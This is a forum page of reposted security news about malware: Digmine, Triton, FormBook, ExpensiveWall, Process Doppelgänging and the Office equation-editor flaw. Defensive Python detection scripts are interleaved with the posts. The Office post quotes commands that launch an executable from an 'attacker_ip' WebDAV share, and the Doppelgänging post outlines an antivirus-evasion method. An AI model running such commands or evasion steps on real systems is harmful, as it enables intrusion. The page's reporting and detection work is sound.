Showing results for tags 'malware'.




Found 66 results

  1. DeepLocker, a novel class of highly targeted and evasive attacks powered by artificial intelligence (AI). DeepLocker was developed as a proof of concept by IBM Research in order to understand how several AI and malware techniques already being seen in the wild could be combined to create a highly evasive new breed of malware, which conceals its malicious intent until it reaches a specific victim. It achieves this by using a Deep Neural Network (DNN) AI model to hide its attack payload in benign carrier applications, while the payload will only be unlocked if—and only if—the intended target is reached. DeepLocker leverages several attributes for target identification, including visual, audio, geolocation, and system-level features. In contrast to existing evasive and targeted malware, this method would make it extremely challenging to reverse engineer the benign carrier software and recover the mission-critical secrets, including the attack payload and the specifics of the target.

     Black Hat presentation slides

     DeepLocker: How AI Can Power a Stealthy New Breed of Malware https://www.youtube.com/watch?v=UeMe_-5W8UY

     State-sponsored cybercrime?
  2. Synopsis: Process Dump is a Windows reverse-engineering command-line tool to dump malware memory components back to disk for analysis. Often malware files are packed and obfuscated before they are executed in order to avoid AV scanners; however, when these files are executed they will often unpack or inject a clean version of the malware code in memory. A common task for malware researchers when analyzing malware is to dump this unpacked code back from memory to disk for scanning with AV products or for analysis with static analysis tools such as IDA.

     Source: http://split-code.com/processdump.html (side note: one of the most interesting websites from a design point of view)

     GitHub Repository: https://github.com/glmcdona/Process-Dump

     Via:
  3. Researchers have discovered new variants of Spectre and Meltdown. The software mitigations for Spectre and Meltdown seem to block these variants, although the eventual CPU fixes will have to be expanded to account for these new attacks. via Bruce Schneier

     I also find interesting the article The Future of Computing Depends on Making It Reversible, It’s time to embrace reversible computing, which could offer dramatic improvements in energy efficiency, by Michael P. Frank, as well as a dialogue posted by readers:

     "I don't understand why they don't just make a separate processor for security sensitive concerns — one that's slower and auditable but still powerful enough to do nice things — and give that its own physical bank of RAM, and allow it to simply communicate with the "crazy fast but side-channel-exfiltrateable" CPU(s). You know they did all of that right? Intel ships a Pentium-class CPU, with no speculative execution, inside every CPU. AMD has something too, I've heard rumors it's ARM. Too bad they did it exactly in the wrong way. They made an unauditable, unusable, trusted component (ME/PSP) that can compromise the main CPU. We can't remove their code, we can't put our own code there... but if we could, it would be exactly what you asked for. They're even advertising it as "for security"."
  4. Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned.

     On Thursday, cybersecurity researchers from FireEye's Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East. The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity.

     Stuxnet was one of the first indicators that such malware exists after the worm was used against industrial players in Iran in 2010, and in 2014, a South Korean nuclear facility was targeted. In 2016, Ukraine's capital Kiev had a power outage after malware took down a power grid.

     The new Trojan, which Symantec researchers say has been active since at least August this year, has been designed to communicate with a specific type of industrial control system (ICS), namely safety instrumented systems (SIS) controllers produced by Triconex. Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system.

     According to Symantec -- while it is early days into the investigation -- the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage.

     In the case of the victim company, Triton was used to target emergency shutdown capabilities. However, the security researchers believe Triton was intended for use in "causing physical damage," but the plant was shut down inadvertently during the attack instead. The malware was deployed in order to reprogram the SIS controllers but some of the devices entered a failed safe state which closed the plant down and alerted operators to the scheme.

     The majority of cyberattackers have money in mind when they deploy malware or infiltrate systems, whether it be to clear out customer accounts or to steal valuable corporate data. However, in this case, there was no clear financial goal -- but the groups' persistence, skill, the targeting of core infrastructure, and what appears to be resources at their disposal all point towards state sponsorship.

     In October, the FBI and US Department of Homeland Security (DHS) warned that energy companies are now under constant attack by threat actors seeking to steal information related to their control systems. Firms in the energy, nuclear, water, aviation, and critical manufacturing sectors are at risk, according to the agencies, from hackers which target small firms as stepping stones towards more valuable companies.

     Via zdnet.com
  5. We found a new cryptocurrency-mining bot spreading through Facebook Messenger, which we first observed in South Korea. We named this Digmine based on the moniker (비트코인 채굴기 bot) it was referred to in a report of recent related incidents in South Korea. We’ve also seen Digmine spreading in other regions such as Vietnam, Azerbaijan, Ukraine, Vietnam, Philippines, Thailand, and Venezuela. It’s not far-off for Digmine to reach other countries given the way it propagates.

     Facebook Messenger works across different platforms, but Digmine only affects Facebook Messenger’s desktop/web browser (Chrome) version. If the file is opened on other platforms (e.g., mobile), the malware will not work as intended. Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends. The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated.

     A known modus operandi of cryptocurrency-mining botnets, and particularly for Digmine (which mines Monero), is to stay in the victim’s system for as long as possible. It also wants to infect as many machines as possible, as this translates to an increased hashrate and potentially more cybercriminal income.

     Figure 1: Digmine’s attack chain

     Figure 2: Link to Digmine sent via Facebook Messenger (top, cropped) and the file pretending to be a video (bottom); original image source: c0nstant (bottom right)

     Infection Chain

     Digmine is a downloader that will first connect to the C&C server to read its configuration and download multiple components. The initial configuration contains links where it downloads components, most of which are also hosted on the same C&C server. It saves the downloaded components in the %appdata%\<username> directory.

     Figure 3: Configuration for the downloader (top); and the downloaded components (bottom)

     Digmine will also perform other routines such as installing a registry autostart mechanism as well as system infection marker. It will search and launch Chrome then load a malicious browser extension that it retrieves from the C&C server. If Chrome is already running, the malware will terminate and relaunch Chrome to ensure the extension is loaded. While extensions can only be loaded and hosted from the Chrome Web Store, the attackers bypassed this by launching Chrome (loaded with the malicious extension) via command line.

     Figure 4: Digmine downloader component in the autostart registry entry (top), and a marker indicating the malware has infected the system (bottom)

     Figure 5: Currently running Chrome process terminated (top) and relaunching Chrome with parameter to load extension (bottom)

     The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video. The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components.

     Figure 6: Configuration link for the decoy video if a separate routine is set by the configuration from the C&C (top), and screenshot of a fake streaming site used to play video as decoy (bottom)

     Figure 7: Initial configuration used by the browser extension

     Propagation

     The browser extension is responsible for propagation via interaction with Chrome, and by extension, Facebook Messenger. This routine is triggered by conditions available in the configuration file retrieved from the C&C server. If the user has their Facebook account automatically logged in by default, the browser extension is able to interact with their account. It does so by downloading additional code from the C&C server. Digmine’s interaction with Facebook could get more functions in the future since it’s possible to add more code.

     Figure 8: Part of additional codes retrieved from C&C server, which allows interaction with Facebook

     Mining Component

     The miner module will be downloaded by codec.exe, which is the miner management component. It will connect to another C&C server to retrieve the miner and its corresponding configuration file. The mining component miner.exe is an iteration of an open-source Monero miner known as XMRig. The miner was reconfigured to execute using the config.json file instead of receiving parameters directly from the command line.

     Figure 9: Miner configuration (top) and codec.exe code launching the miner component with config (bottom)

     C&C Communication and Protocol

     Both the downloader and mining management component use specific HTTP headers to communicate with the C&C server. When downloading the initial configuration, the malware constructs the HTTP GET request before sending to the C&C server:

         GET /api/apple/config.php HTTP/1.1
         Connection: Keep-Alive
         Accept: */*
         User-Agent: Miner
         Window: <Window name of active window>
         ScriptName: <filename of malware>
         OS: <OS version>
         Host: <C&C>

     Of note is how the malware uses a specific User-Agent called Miner. It denies access to the initial configuration file if the HTTP header request is incorrect.

     Best Practices

     The increasing popularity of cryptocurrency mining is drawing attackers back to the mining botnet business. And like many cybercriminal schemes, numbers are crucial—bigger victim pools equate to potentially bigger profits. The fact that they’re piggybacking on popular platforms such as social media to spread their malware is unsurprising. To avoid these types of threats, follow best practices on securing social media accounts: think before you share, be aware of suspicious and unsolicited messages, and enable your account’s privacy settings.

     We disclosed our findings to Facebook, which promptly removed many of the Digmine-related links from its platform. In Facebook’s official statement, “We maintain a number of automated systems to help stop harmful links and files from appearing on Facebook and in Messenger. If we suspect your computer is infected with malware, we will provide you with a free anti-virus scan from our trusted partners. We share tips on how to stay secure and links to these scanners on facebook.com/help.”

     Indicators of Compromise (IoCs):

     Hash detected as TROJ_DIGMINEIN.A (SHA256): beb7274d78c63aa44515fe6bbfd324f49ec2cc0b8650aeb2d6c8ab61a0ae9f1d
     Hash detected as BREX_DIGMINEEX.A (SHA256): 5a5b8551a82c57b683f9bd8ba49aefeab3d7c9d299a2d2cb446816cd15d3b3e9
     Hash detected as TROJ_DIGMINE.A (SHA256): f7e0398ae1f5a2f48055cf712b08972a1b6eb14579333bf038d37ed862c55909

     C&C servers related to Digmine (including subdomains): vijus[.]bid ozivu[.]bid thisdayfunnyday[.]space thisaworkstation[.]space mybigthink[.]space mokuz[.]bid pabus[.]bid yezav[.]bid bigih[.]bid taraz[.]bid megu[.]info

     Source: http://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/
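The request profile described in the Digmine post above, turned into a proxy-log triage check (an added example, not code from the original article or its authors). The function names, scoring weights, alert threshold and all sample requests are assumptions constructed for illustration; the scoring also flags requests that keep the host-leaking headers but change the User-Agent or path, since the post notes the C&C can push updates.

```python
from dataclasses import dataclass, field

BEACON_PATH = "/api/apple/config.php"   # path in the request shown in the post
BEACON_UA = "miner"                     # User-Agent value, compared case-insensitively
HOST_INFO_HEADERS = ("window", "scriptname", "os")  # non-standard headers in that request
ALERT_THRESHOLD = 3                     # assumption: tune against your own traffic


@dataclass
class Finding:
    host: str
    score: int
    reasons: list = field(default_factory=list)


def parse_request(raw):
    """Return (method, path, headers) for a raw HTTP/1.x request, or None if malformed."""
    lines = raw.strip().splitlines()
    if not lines:
        return None
    parts = lines[0].split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header block
        name, sep, value = line.partition(":")  # window titles may contain ':'
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def score_request(raw):
    """Score one request against the profile; return a Finding or None."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, path, headers = parsed
    score, reasons = 0, []
    if headers.get("user-agent", "").lower() == BEACON_UA:
        score += 3
        reasons.append("User-Agent is 'Miner'")
    leaked = [h for h in HOST_INFO_HEADERS if h in headers]
    if leaked:
        score += len(leaked)
        reasons.append("host-info headers: " + ", ".join(leaked))
    if method == "GET" and path.split("?", 1)[0] == BEACON_PATH:
        score += 2
        reasons.append("config path " + BEACON_PATH)
    if score < ALERT_THRESHOLD:
        return None
    return Finding(headers.get("host", "?"), score, reasons)


def triage(requests):
    """Return findings for every request that reaches the alert threshold."""
    return [f for f in (score_request(r) for r in requests) if f is not None]


# Constructed sample requests (placeholder hosts, not real indicators).
SAMPLE_BEACON = """
GET /api/apple/config.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Miner
Window: Program Manager
ScriptName: video_1234.exe
OS: WIN_10
Host: c2.example.invalid
"""

SAMPLE_BROWSER = """
GET /index.html HTTP/1.1
Host: www.example.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html
"""

SAMPLE_VARIANT = """
GET /cfg HTTP/1.1
User-Agent: Mozilla/5.0
Window: Untitled - Notepad
ScriptName: clip.exe
OS: WIN_7
Host: other.example.invalid
"""

if __name__ == "__main__":
    for finding in triage([SAMPLE_BEACON, SAMPLE_BROWSER, SAMPLE_VARIANT]):
        print(finding.host, finding.score, "; ".join(finding.reasons))
```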
  6. A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools.

     Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader. Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London.

     Process Doppelgänging Works on All Windows Versions

     Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker News that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products.

     In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore.

     On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows.

     Here's How the Process Doppelgänging Attack Works:

     Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions. NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely.

     According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below:

     1. Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file.
     2. Load—create a memory section from the modified (malicious) file.
     3. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed.
     4. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs."

     Process Doppelgänging Evades Detection from Most Antiviruses

     Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advanced forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection.

     When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below:

     However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article.

     Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10.

     I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks.

     This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated AtomBombing technique which also abused a designing weakness in Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory.

     Via thehackernews.com
  7. You should be extra careful when opening files in MS Office.

     When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers. The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

     Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.

     The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents. However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

     Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

     DEMO: Exploitation Allows Full System Take Over

     Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software. This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).

     Possible Attack Scenario:

     While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:

     • "By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."
     • "One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."
     • "Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."
     • "After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."

     Protection Against Microsoft Office Vulnerability

     With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory. So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.

     Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security. Users can run the following command in the command prompt to disable registering of the component in Windows registry:

         reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

     For 32-bit Microsoft Office package in x64 OS, run the following command:

         reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

     Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

     Via thehackernews.com
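A way to verify that the two `reg add` commands in the post above actually took effect on a host, as an added example that is not part of the original article: it parses the text of a registry export (for instance produced with `reg export`) and reports the state of the 0x400 flag under both the native and the Wow6432Node key. The function names, status labels and the sample export are assumptions constructed for illustration.

```python
import re

CLSID = "{0002CE02-0000-0000-C000-000000000046}"   # CLSID from the commands in the post
FLAG = 0x400                                        # value written by those commands
KEY_SUFFIX = r"\Microsoft\Office\Common\COM Compatibility" + "\\" + CLSID
VIEWS = {
    "native": r"HKEY_LOCAL_MACHINE\SOFTWARE" + KEY_SUFFIX,
    "wow6432": r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node" + KEY_SUFFIX,
}
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Map upper-cased key path -> {lower-cased value name: int} for dword values."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].upper(), {})
        elif current is not None:
            match = DWORD_RE.match(line)
            if match:
                current[match.group(1).lower()] = int(match.group(2), 16)
    return keys


def audit_equation_editor_flag(text):
    """Return {'native': status, 'wow6432': status} for the exported registry text.

    status is 'disabled' when the 0x400 bit is set, 'enabled' when the value
    exists without that bit, and 'missing' when the key or value is absent.
    """
    keys = parse_reg_export(text)
    result = {}
    for view, path in VIEWS.items():
        values = keys.get(path.upper(), {})
        flags = values.get("compatibility flags")
        if flags is None:
            result[view] = "missing"
        elif flags & FLAG:      # bit test: other flag bits may be set as well
            result[view] = "disabled"
        else:
            result[view] = "enabled"
    return result


# Constructed sample export: native key hardened, 32-bit view left unprotected.
SAMPLE_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}]
"Compatibility Flags"=dword:00000000
"""

if __name__ == "__main__":
    for view, status in audit_equation_editor_flag(SAMPLE_EXPORT).items():
        print(view, status)
```

A host running 32-bit Office on 64-bit Windows is only covered when the `wow6432` view reports `disabled`, which is the case the second command in the post addresses.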
  8. Synopsis: Noriben is a Python-based script that works in conjunction with SysInternals Procmon to automatically collect, analyze, and report on run-time indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities. Link: https://github.com/Rurik/noriben
  9. Disassembler and Runtime Analysis (or how IDA Pro has some difficulties when displaying correctly the assembly of the patched run-time whilst using a Graph view) Link: http://blog.talosintelligence.com/2017/10/disassembler-and-runtime-analysis.html
  10. https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/
  11. It seems sophisticated hackers have changed the way they conduct targeted cyber operations—instead of investing in zero-days and developing their malware; some hacking groups have now started using ready-made malware just like script kiddies. Possibly, this could be a smart move for state-sponsored hackers to avoid being attributed easily.

     Security researchers from multiple security firms, including Arbor Networks and FireEye, independently discovered a series of malware campaigns primarily targeting aerospace, defence contractors and manufacturing sectors in various countries, including the United States, Thailand, South Korea and India.

     What's common? All these attack campaigns, conducted by various hacking groups, eventually install same information and password stealer malware—dubbed FormBook—on the targeted systems.

     FormBook is nothing but a "malware-as-a-service," which is an affordable piece of data-stealing and form-grabbing malware that has been advertised in various hacking forums since early 2016. Anyone can rent FormBook for just $29 per week or $59 per month, which offers a range of advanced spying capabilities on target machines, including a keylogger, password stealer, network sniffer, taking the screenshots, web form data stealer and more.

     According to the researchers, attackers in each campaign are primarily using emails to distribute the FormBook malware as an attachment in different forms, including PDFs with malicious download links, DOC and XLS files with malicious macros, and archive files (ZIP, RAR, ACE, and ISOs) containing EXE payloads.

     Once installed on a target system, the malware injects itself into various processes and starts capturing keystrokes and extracts stored passwords and other sensitive data from multiple applications, including Google Chrome, Firefox, Skype, Safari, Vivaldi, Q-360, Microsoft Outlook, Mozilla Thunderbird, 3D-FTP, FileZilla and WinSCP. FormBook continuously sends all the stolen data to a remote command and control (C2) server which also allows the attacker to execute other commands on the targeted system, including start processes, shutdown and reboot the system, and stealing cookies.

     According to the researchers, FormBook was also seen downloading other malware families such as NanoCore in the last few weeks. The attackers can even use the data successfully harvested by FormBook for further cybercriminal activities including, identity theft, continued phishing operations, bank fraud and extortion.

     FormBook is neither sophisticated, nor difficult-to-detect malware, so the best way to protect yourself from this malware is to keep good antivirus software on your systems, and always keep it up-to-date.

     Via thehackernews.com
  12. Check Point’s mobile threat research team identified a new variant of an Android malware that sends fraudulent premium SMS messages and charges users’ accounts for fake services without their knowledge. According to Google Play data, the malware infected at least 50 apps and was downloaded between 1 million and 4.2 million times before the affected apps were removed. The new strain of malware is dubbed “ExpensiveWall,” after one of the apps it uses to infect devices, “Lovely Wallpaper.” ExpensiveWall is a new variant of a malware found earlier this year on Google Play. The entire malware family has now been downloaded between 5.9 million and 21.1 million times. What makes ExpensiveWall different than its other family members is that it is ‘packed’ – an advanced obfuscation technique used by malware developers to encrypt malicious code – allowing it to evade Google Play’s built-in anti-malware protections. Learn how SandBlast Mobile protects against malware like ExpensiveWall. Check Point notified Google about ExpensiveWall on August 7, 2017, and Google promptly removed the reported samples from its store. However, even after the affected Apps were removed, within days another sample infiltrated Google Play, infecting more than 5,000 devices before it was removed four days later. Figure 1: One of the malicious apps containing ExpensiveWall. It’s important to point out that any infected app installed before it was removed from the App store, still remains installed on users’ devices. Users who downloaded these apps are therefore still at risk and should manually remove them from their devices. What does ExpensiveWall do? The malware registers victims to premium services without their knowledge and sends fraudulent premium SMS messages, charging their accounts for fake services. Why is ExpensiveWall dangerous? 
While ExpensiveWall is currently designed only to generate profit from its victims, a similar malware could be easily modified to use the same infrastructure in order to capture pictures, record audio, and even steal sensitive data and send the data to a command and control (C&C) server. Since the malware is capable of operating silently, all of this illicit activity takes place without the victim’s knowledge, turning it into the ultimate spying tool. How does ExpensiveWall work? Once ExpensiveWall is downloaded, it requests several common permissions, including internet access – which allows the app to connect to its C&C server – and SMS permissions – which enable it to send premium SMS messages and register users for other paid services all without the users knowledge. While these permissions are harmful within the context of a malware, many apps request the same permissions for legitimate purposes. Most users grant these permissions without thinking, especially when installing an app from a trustworthy source such as Google Play. ExpensiveWall contains an interface that connects between in-app actions and the JavaScript code, which runs on a web interface called WebView, meaning JavaScript running inside the WebView can trigger in-app activities. After it is installed and granted the necessary permissions, ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI. Figure 2: Clicking functionality used by the ExpensiveWall malware. Each time the device is switched on, or experiences a connectivity change, the app connects to its C&C server and receives a URL, which it opens in an embedded WebView. This page contains a malicious JavaScript code that can invoke in-app functions using JavascriptInterface, like subscribing them to premium services and sending SMS messages. 
The malware initiates the JavaScript code by silently clicking on the links in the webpage, in the same way it clicks on ads in other occasions. Subscribing victims to paid services The malware obtains the device’s phone number and uses it to subscribe the user to different paid services, such as the example below: Figure 3: Code used to obtain phone number. Figure 4: A premium service the malware subscribes the user to. Sending premium SMS messages In some cases, the SMS activity takes place without giving the user any notice. In other cases, the malware presents the user with a button called “Continue,” and once the user clicks the button, the malware sends a premium SMS on his behalf. Below is an example of the HTML code containing the embedded JavaScript: Figure 5: embedded JavaScript responsible for sending SMS messages. ExpensiveWall on Google Play The malicious activities did not go unnoticed by the users, as one notes below: Figure 6: User’s comments on an ExpensiveWall app. As seen in the image above, many users suspected that ExpensiveWall was a malicious app. The comments indicate that the app is promoted on several social networks including Instagram, which might explain how it came to be downloaded so many times. See Check Point Research for the complete technical report. After analyzing different samples of the malware, Check Point mobile threat researchers believe ExpensiveWall is spread to different apps as an SDK called “gtk,” which developers embed in their own apps. Three versions of apps containing the malicious code exist. The first is the unpacked version, which was discovered earlier this year. The second is the packed version, which is being discussed here, and the third contains the code but does not actively use it. Users and organizations should be aware that any malware attack is a severe breach of their mobile network, even if it starts out as a seemingly harmless adware. 
ExpensiveWall is yet another example of the immediate need to protect all mobile devices against advanced threats.

How to stay protected

Cutting-edge malware such as ExpensiveWall requires advanced protections, capable of identifying and blocking zero-day malware by using both static and dynamic app analysis. Only by examining the malware within context of its operation on a device can successful strategies to block it be created. Users and enterprises should treat their mobile devices just like any other part of their network, and protect them with the best cybersecurity solutions available. Check Point customers are protected by SandBlast Mobile, and on the network front by Check Point Anti-Bot Blade, which provides protection against this threat with the signature: Trojan.AndroidOS.ExpensiveWall.

Appendix 1: List of Package names and downloads:

Total downloads (min / max): 5,904,511 / 21,101,567

Source: https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
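A triage sketch for the combination described in the article above, added here as an example and not taken from Check Point's report: it flags an app whose manifest pairs INTERNET and SEND_SMS with boot or connectivity-change triggers, and whose decompiled source exposes a WebView JavaScript bridge that reaches the SMS API. The manifest, the Java snippet and the names `com.example.wallpaper`, `Bridge` and `sendSms` are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
TRIGGERS = {"android.intent.action.BOOT_COMPLETED",
            "android.net.conn.CONNECTIVITY_CHANGE"}
SMS_SINKS = ("sendTextMessage", "sendMultipartTextMessage")
BRIDGE_METHOD = re.compile(
    r"@JavascriptInterface\s+(?:public\s+)?[\w<>\[\]]+\s+(\w+)\s*\([^)]*\)\s*\{")

# Constructed sample manifest (hypothetical package, not a real app).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.wallpaper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <application>
    <receiver android:name=".StartReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed decompiled Java (hypothetical class and method names).
SAMPLE_JAVA = """
public class Bridge {
    @JavascriptInterface
    public void sendSms(String number, String body) {
        SmsManager.getDefault().sendTextMessage(number, null, body, null, null);
    }
}
class Page extends Activity {
    void load(String url) {
        WebView w = new WebView(this);
        w.getSettings().setJavaScriptEnabled(true);
        w.addJavascriptInterface(new Bridge(), "app");
        w.loadUrl(url);
    }
}
"""


def manifest_facts(manifest_xml):
    """Return (requested permissions, intent actions the app listens for)."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID + "name") for e in root.iter("uses-permission")}
    actions = {e.get(ANDROID + "name") for e in root.iter("action")}
    return perms, actions


def bridge_methods(java_src):
    """Yield (name, body) for every method annotated @JavascriptInterface."""
    for m in BRIDGE_METHOD.finditer(java_src):
        start, depth = m.end() - 1, 0          # index of the opening brace
        for i in range(start, len(java_src)):
            depth += {"{": 1, "}": -1}.get(java_src[i], 0)
            if depth == 0:                     # matching closing brace found
                yield m.group(1), java_src[start:i + 1]
                break


def triage(manifest_xml, java_src):
    """List the traits from the article that this app exhibits."""
    perms, actions = manifest_facts(manifest_xml)
    findings = []
    if {"android.permission.INTERNET", "android.permission.SEND_SMS"} <= perms:
        findings.append("permissions: INTERNET + SEND_SMS")
    hits = sorted(actions & TRIGGERS)
    if hits:
        findings.append("auto-start triggers: "
                        + ", ".join(a.rsplit(".", 1)[1] for a in hits))
    if "addJavascriptInterface" in java_src:
        findings.append("WebView exposes a JavaScript bridge")
    for name, body in bridge_methods(java_src):
        if any(sink in body for sink in SMS_SINKS):
            findings.append(f"bridge method {name}() can send SMS")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_MANIFEST, SAMPLE_JAVA):
        print(line)
```

Each trait is common in legitimate apps on its own; the useful signal is all of them appearing together.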
